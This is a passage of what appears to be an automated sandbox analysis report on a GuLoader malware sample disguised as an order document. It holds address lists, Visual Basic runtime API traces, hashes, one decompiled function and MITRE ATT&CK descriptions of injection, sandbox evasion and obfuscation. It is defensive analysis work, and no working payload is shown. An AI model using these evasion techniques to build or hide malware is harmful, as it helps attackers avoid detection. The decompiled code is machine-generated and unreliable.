0x0042f075
0x0042f078
0x0042f07e
0x0042f082
0x0042f084
0x0042f089
0x0042f08e
0x0042f08f
0x0042f090
0x0042f090
0x0042f098
0x0042f0a0
0x0042f0a4
0x0042f0a5
0x0042f0a7
0x0042f0b6
0x0042f0b8
0x0042f0bd
0x0042f0c2
0x0042f0c2
0x0042f0c7
0x0042f0d9
0x0042f0dd
0x0042f0e6
0x0042f0ec
0x0042f0f0
0x0042f0f7
0x0042f0fa
0x0042f0fe
0x0042f100
0x0042f102
0x0042f103
0x0042f104
0x0042f105
0x0042f105
0x0042f10d
0x0042f115
0x0042f115
0x0042f11a
0x0042f121
0x0042f123
0x0042f128
0x0042f12d
0x0042f132
0x0042f132
0x0042f141
0x0042f145
0x0042f14d
0x0042f153
0x0042f159
0x0042f15d
0x0042f15f
0x0042f164
0x0042f169
0x0042f16a
0x0042f16b
0x0042f16b
0x0042f170
0x0042f176
0x0042f179
0x0042f17e
0x0042f1b6
0x0042f1be
0x0042f1c6
0x0042f1ce
0x0042f1d3

APIs

__vbaNew2.MSVBVM60(0042AF8C,00430340), ref: 0042EC9F
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000014), ref: 0042ECC4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042AC4C,000000C8), ref: 0042ECF4
__vbaFreeObj.MSVBVM60(00000000,?,0042AC4C,000000C8), ref: 0042ECFC
__vbaNew2.MSVBVM60(0042AF8C,00430340), ref: 0042ED10
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000014), ref: 0042ED30
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042AC4C,00000100), ref: 0042ED59
__vbaFreeObj.MSVBVM60(00000000,?,0042AC4C,00000100), ref: 0042ED72
__vbaNew2.MSVBVM60(0042AF8C,00430340), ref: 0042ED8F
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000014), ref: 0042EDAF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042AC4C,000000D0), ref: 0042EDD8
__vbaStrMove.MSVBVM60(00000000,?,0042AC4C,000000D0), ref: 0042EDE7
__vbaFreeObj.MSVBVM60(00000000,?,0042AC4C,000000D0), ref: 0042EDEF
__vbaNew2.MSVBVM60(0042AF8C,00430340), ref: 0042EE03
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000014), ref: 0042EE23
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042AC4C,00000058), ref: 0042EE46
__vbaStrMove.MSVBVM60(00000000,?,0042AC4C,00000058), ref: 0042EE55
__vbaFreeObj.MSVBVM60(00000000,?,0042AC4C,00000058), ref: 0042EE5D
__vbaNew2.MSVBVM60(0042AF8C,00430340), ref: 0042EE75
__vbaCastObj.MSVBVM60(?,0042B348,erantissen), ref: 0042EE8F
__vbaObjSet.MSVBVM60(?,00000000,?,0042B348,erantissen), ref: 0042EE99
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000040), ref: 0042EEAE
__vbaFreeObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000040), ref: 0042EEB6
__vbaNew2.MSVBVM60(0042A01C,00430010), ref: 0042EED3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042EEEB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B0FC,00000158), ref: 0042EF11
__vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 0042EF1F
__vbaStrToAnsi.MSVBVM60(?,Belj,00000000,?,?,00000000), ref: 0042EF2E
__vbaSetSystemError.MSVBVM60(00000000,?,Belj,00000000,?,?,00000000), ref: 0042EF3C
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,Belj,00000000,?,?,00000000), ref: 0042EF60
__vbaFreeObj.MSVBVM60(00000000), ref: 0042EF6B
__vbaNew2.MSVBVM60(0042AF8C,00430340,00000000), ref: 0042EF88
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000014), ref: 0042EFA8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042AC4C,00000138), ref: 0042EFD4
__vbaFreeObj.MSVBVM60 ref: 0042EFDC
__vbaNew2.MSVBVM60(0042A01C,00430010), ref: 0042EFF4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042F00C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B0FC,00000238), ref: 0042F032
__vbaNew2.MSVBVM60(0042AF8C,00430340), ref: 0042F046
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000014), ref: 0042F066
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042AC4C,00000138), ref: 0042F090
__vbaFreeStr.MSVBVM60 ref: 0042F098
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0042F0A7
__vbaNew2.MSVBVM60(0042AF8C,00430340), ref: 0042F0C2
__vbaLateMemCallLd.MSVBVM60(?,?,L5kppEjAHuXwB01I3FcVsAcOnr6ZrARmCtewD172,00000000), ref: 0042F0DD
__vbaObjVar.MSVBVM60(00000000), ref: 0042F0E6
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 0042F0F0
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,0000000C), ref: 0042F105
__vbaFreeObj.MSVBVM60 ref: 0042F10D
__vbaFreeVar.MSVBVM60 ref: 0042F115
__vbaNew2.MSVBVM60(0042A01C,00430010,00000000), ref: 0042F12D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042F145
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B0FC,00000168), ref: 0042F16B
__vbaFreeObj.MSVBVM60 ref: 0042F179
__vbaFreeObj.MSVBVM60(0042F1D4), ref: 0042F1B6
__vbaFreeStr.MSVBVM60(0042F1D4), ref: 0042F1BE
__vbaFreeObj.MSVBVM60(0042F1D4), ref: 0042F1C6
__vbaFreeStr.MSVBVM60(0042F1D4), ref: 0042F1CE

Strings

erantissen, xrefs: 0042EE82
Belj, xrefs: 0042EF25
Hjerneskade2, xrefs: 0042EFB4
L5kppEjAHuXwB01I3FcVsAcOnr6ZrARmCtewD172, xrefs: 0042F0D1

Memory Dump Source

Source File: 00000000.00000002.758565087.0000000000429000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.758417737.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.758452513.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758479347.0000000000419000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758619364.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.758690514.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$AnsiListMove$AddrefCallCastErrorLateSystem
String ID: Belj$Hjerneskade2$L5kppEjAHuXwB01I3FcVsAcOnr6ZrARmCtewD172$erantissen
API String ID: 2267351454-1023941644
Opcode ID: b9057b38641d20df31872ec2f2bb2a87a63899f27665414bc1c4a52c121624c0
Instruction ID: eddb452eadcf256ab2257bef4b3dd8e4869730e6fc788f70b04aa359ed887350
Opcode Fuzzy Hash: b9057b38641d20df31872ec2f2bb2a87a63899f27665414bc1c4a52c121624c0
Instruction Fuzzy Hash: 44F18170A00218ABEB14EBA2DC5AFDF77BCEF14745F50052EF801B71A1DB789905CA68

Uniqueness

Uniqueness Score: -1.00%

Function 0042EA2B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0042EA2B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				void* _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				char _v56;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t30;
				void* _t32;
				intOrPtr* _t33;
				void* _t34;
				intOrPtr* _t36;
				intOrPtr* _t49;
				intOrPtr* _t50;
				void* _t51;
				void* _t53;
				intOrPtr _t54;

				_t54 = _t53 - 0xc;
				 *[fs:0x0] = _t54;
				_v16 = _t54 - 0x38;
				_v12 = 0x401178;
				_v8 = 0;
				_t24 = _a4;
				 *((intOrPtr*)( *_t24 + 4))(_t24, __edi, __esi, __ebx,  *[fs:0x0], 0x4011b6, _t51);
				_t26 =  *0x430010; // 0x4df9f8
				_v28 = 0;
				_v36 = 0;
				_v56 = 0;
				if(_t26 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t26 =  *0x430010; // 0x4df9f8
				}
				_t28 =  &_v36;
				L00401312();
				_v44 = 0x80020004;
				_v52 = 0xa;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t36 = _t28;
				asm("movsd");
				_t30 =  *((intOrPtr*)( *_t36 + 0x1ec))(_t36, L"UNSPROUTED", _t28,  *((intOrPtr*)( *_t26 + 0x2fc))(_t26));
				asm("fclex");
				if(_t30 < 0) {
					_push(0x1ec);
					_push(0x42b11c);
					_push(_t36);
					_push(_t30);
					L00401306();
				}
				L00401300();
				if( *0x430340 == 0) {
					_push(0x430340);
					_push(0x42af8c);
					L0040130C();
				}
				_t49 =  *0x430340; // 0x218e8b4
				_t32 =  *((intOrPtr*)( *_t49 + 0x14))(_t49,  &_v36);
				asm("fclex");
				if(_t32 < 0) {
					_push(0x14);
					_push(0x42b13c);
					_push(_t49);
					_push(_t32);
					L00401306();
				}
				_t33 = _v36;
				_t50 = _t33;
				_t34 =  *((intOrPtr*)( *_t33 + 0x70))(_t33,  &_v56);
				asm("fclex");
				if(_t34 < 0) {
					_push(0x70);
					_push(0x42ac4c);
					_push(_t50);
					_push(_t34);
					L00401306();
				}
				L00401300();
				_v28 = 0x4a1061;
				_push(0x42eb63);
				return _t34;
			}

0x0042ea2e
0x0042ea3d
0x0042ea4a
0x0042ea4d
0x0042ea56
0x0042ea59
0x0042ea5f
0x0042ea62
0x0042ea69
0x0042ea6c
0x0042ea6f
0x0042ea72
0x0042ea74
0x0042ea79
0x0042ea7e
0x0042ea83
0x0042ea83
0x0042ea92
0x0042ea96
0x0042eaa0
0x0042eaa7
0x0042eab1
0x0042eab2
0x0042eab3
0x0042eab4
0x0042eabe
0x0042eabf
0x0042eac7
0x0042eac9
0x0042eacb
0x0042ead0
0x0042ead5
0x0042ead6
0x0042ead7
0x0042ead7
0x0042eadf
0x0042eaeb
0x0042eaed
0x0042eaf2
0x0042eaf7
0x0042eaf7
0x0042eafc
0x0042eb09
0x0042eb0c
0x0042eb10
0x0042eb12
0x0042eb14
0x0042eb19
0x0042eb1a
0x0042eb1b
0x0042eb1b
0x0042eb20
0x0042eb2a
0x0042eb2c
0x0042eb2f
0x0042eb33
0x0042eb35
0x0042eb37
0x0042eb3c
0x0042eb3d
0x0042eb3e
0x0042eb3e
0x0042eb46
0x0042eb4b
0x0042eb52
0x00000000

APIs

__vbaNew2.MSVBVM60(0042A01C,00430010), ref: 0042EA7E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042EA96
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B11C,000001EC), ref: 0042EAD7
__vbaFreeObj.MSVBVM60 ref: 0042EADF
__vbaNew2.MSVBVM60(0042AF8C,00430340), ref: 0042EAF7
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000014), ref: 0042EB1B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042AC4C,00000070), ref: 0042EB3E
__vbaFreeObj.MSVBVM60 ref: 0042EB46

Strings

UNSPROUTED, xrefs: 0042EAB8

Memory Dump Source

Source File: 00000000.00000002.758565087.0000000000429000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.758417737.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.758452513.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758479347.0000000000419000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758619364.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.758690514.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2
String ID: UNSPROUTED
API String ID: 4261391273-2728902956
Opcode ID: 6ae32a03e2cd90a64db5749570e9f98a2e6e02957f811e1b76bb9b24d653415f
Instruction ID: 43069be268313c0109e525fda23e0d8827d801875e2e4115970a217f8b906b08
Opcode Fuzzy Hash: 6ae32a03e2cd90a64db5749570e9f98a2e6e02957f811e1b76bb9b24d653415f
Instruction Fuzzy Hash: BF318870A00324ABDB14EF95DC55F9E7BB8FF09704F50012AF801B7291D7BC99058799

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Pedido N#U00famero 4432003039.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: Pedido N#U00famero 4432003039.exe PID: 6236 Parent PID: 5720

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: Pedido N#U00famero 4432003039.exe PID: 6236 Parent PID: 5720 Pedido N#U00famero 4432003039.exeCOMMON

Executed Functions

Function 02AD559D, Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 593memorynativeCOMMON

Function 0042B824, Relevance: 248.0, APIs: 136, Strings: 5, Instructions: 1279
COMMON

Function 0042E6BD, Relevance: 79.0, APIs: 42, Strings: 3, Instructions: 259
COMMON

Function 0042EC3E, Relevance: 109.0, APIs: 58, Strings: 4, Instructions: 464
COMMON

Function 0042EA2B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 100
COMMON